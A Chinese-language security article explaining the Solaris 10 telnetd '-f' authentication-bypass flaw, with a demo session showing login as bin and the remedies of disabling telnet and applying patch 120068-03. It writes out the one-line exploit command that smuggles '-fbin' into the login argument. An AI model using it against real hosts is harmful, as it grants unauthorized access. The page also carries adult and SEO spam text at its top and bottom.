成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

聽高手談telnet安全漏洞

作者:佚名
網絡 網絡管理
telnet安全漏洞的問題如何解決呢?首先我們來了解一下目前telnet安全漏洞的情況,然后再看看高手是如何處理的。

telnet安全問題一直是我們重點關注的問題。那么今天我們就來討論一下telnet安全漏洞的內容。那么來了解一下telnet安全漏洞的基本情況。早期Solaris 2.6、7 和 8 的 telnetd存在一個漏洞, 可以通過/bin/login的環境變數 TTYPROMPT 繞過驗證,導致無需身份認證即可登錄。最近,Solaris 10的telnet又被發現出現了漏洞,Sun也及時推出了補丁。

我們先來看問題的癥狀。漏洞出現的系統環境為Solaris 10及以后版本,安裝時沒有選擇默認安裝。漏洞表現為通過在Solaris的telnet命令的-l選項后指定任意一個“-fusername”參數,就可以直接登錄進入Solaris系統。

命令格式:

  1. telnet -l "-fbin" target_address 

下面是通過telnet安全漏洞以bin用戶登錄系統的演示。

  1. # telnet -l "-fbin" myhost  
  2. Trying 172.21.60.120...  
  3. Connected to myhost.  
  4. Escape character is '^]'.  
  5. Sun Microsystems Inc.  SunOS 5.10 Generic January 2005  
  6. $ id -a  
  7. uid=2(bin) gid=2(bin) groups=2(bin),3(sys) 

如果管理員修改了/etc/default/login文件,在注釋掉CONSOLE行允許root遠程登錄的情況下,訪問者可以利用該漏洞直接以root登錄系統,這樣對系統危害更大。

Kingcope最早給出了在OpenSolaris中發現的該漏洞的源代碼,并稱其為“0day”-零日漏洞。文章地址為:http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf

該文章中提供一個腳本,運行后用戶可以獲得被登錄系統的adm用戶權限。

解決方法:

1. 禁止Solaris 10的telnet服務。

檢查本機的telnet服務是否啟動。

  1. # svccfg list | grep telnet  
  2. network/telnet  
  3. # svcs -l network/telnet  
  4. fmri svc:/network/telnet:default  
  5. name Telnet server  
  6. enabled true  
  7. stateonline  
  8. next_state  none  
  9. state_time  Mon Feb 26 03:50:13 2007  
  10. restartersvc:/network/inetd:default 

禁止telnet服務。

  1. # svcadm disable svc:/network/telnet:default 

2. 下載安裝Sun的安全補丁(需Sun服務支持)。

Sun的技術支持工程師Alan Hargreaves在他2月13日的BLOG:http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit

中提到,最終解決該問題的補丁120068-03已經發布。通過Solaris 10的Update Manager可以下載安裝該補丁,如圖所示。這里可以看到該補丁是2月21日發布的。

telnet漏洞

需要說明的是Solaris 10的補丁,除了Security和hardware相關補丁可以免費下載,其它都是要服務支持的,就是Sun Service Plan。但是對于知道Patch號的,可以從http://sunsolve.sun.com中單個下載。這里可以在sunsolve上用PatchFinder查找120068-03補丁并下載,安裝到系統中。

安裝補丁后系統漏洞被禁止。

  1. # showrev -p | grep 120068  
  2. Patch: 120068-01 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd  
  3. Patch: 120068-03 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd  
  4. # telnet -l "-fbin" myhost  
  5. Trying 172.21.60.120...  
  6. Connected to myhost.  
  7. Escape character is '^]'.  
  8. Password: 

需要用戶輸入密碼登錄,可見當前Solaris 10系統的telnet安全漏洞被修正。

對新發現的Solaris 10的telnet安全漏洞,Sun的反應還算迅速,立刻推出了相應補丁程序。這里也可以看見,任何操作系統都是有Bug存在的,Sun通過OpenSolaris開源,使得系統的bug能盡快被發現和完善。

責任編輯:佟健 來源: 網絡整理
telnet安全漏洞
相關推薦

2010-07-26 15:37:12

telnet安全漏洞

2009-11-17 10:20:01

Oracle Spat

2014-06-03 09:23:41

2014-06-03 11:36:18

2020-10-09 09:52:00

漏洞分析

2009-03-07 09:59:16

2011-12-26 11:22:48

2021-05-12 10:46:23

漏洞BINDDNS服務器

2010-03-05 15:46:05

2023-12-31 09:06:08

2022-07-06 11:50:43

漏洞網絡攻擊

2024-06-07 15:26:22

2010-03-25 17:31:16

2010-12-13 12:35:56

職場

2009-11-02 18:56:49

調整Oracle數據庫

2009-05-13 09:49:07

2010-08-30 13:07:31

2011-08-08 15:48:08

2014-03-02 15:06:33

2009-10-29 13:32:05

漏洞
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 午夜欧美| 亚洲成人网在线 | 免费污视频 | 精品国产一区二区国模嫣然 | 国产精品一区二区三区在线 | 欧美综合自拍 | 国产精品毛片一区二区在线看 | 黄色网址在线免费观看 | 日韩一区二区免费视频 | 韩国av一区二区 | 秋霞电影一区二区 | 亚洲免费人成在线视频观看 | 久久久久国产 | 91在线视频国产 | 亚洲成人综合网站 | 亚洲精品一区二区在线观看 | 在线免费观看毛片 | 国产午夜精品一区二区三区四区 | 日韩成人av在线 | 亚洲系列第一页 | 精品一区二区三区在线观看 | 久久久久无码国产精品一区 | 97国产精品视频人人做人人爱 | 久久免费高清视频 | 欧美va大片 | 在线观看久草 | 国产精品久久久久久福利一牛影视 | 天天射影院 | 久久精品成人 | 亚洲一区亚洲二区 | 亚洲一二三区精品 | www四虎影视 | 成人在线免费观看视频 | 国产一区二区三区精品久久久 | 日韩一二三区视频 | 免费国产视频 | h视频免费在线观看 | 国产精品揄拍一区二区 | 91中文在线观看 | 国产精品久久久久久妇女 | 欧美午夜视频 |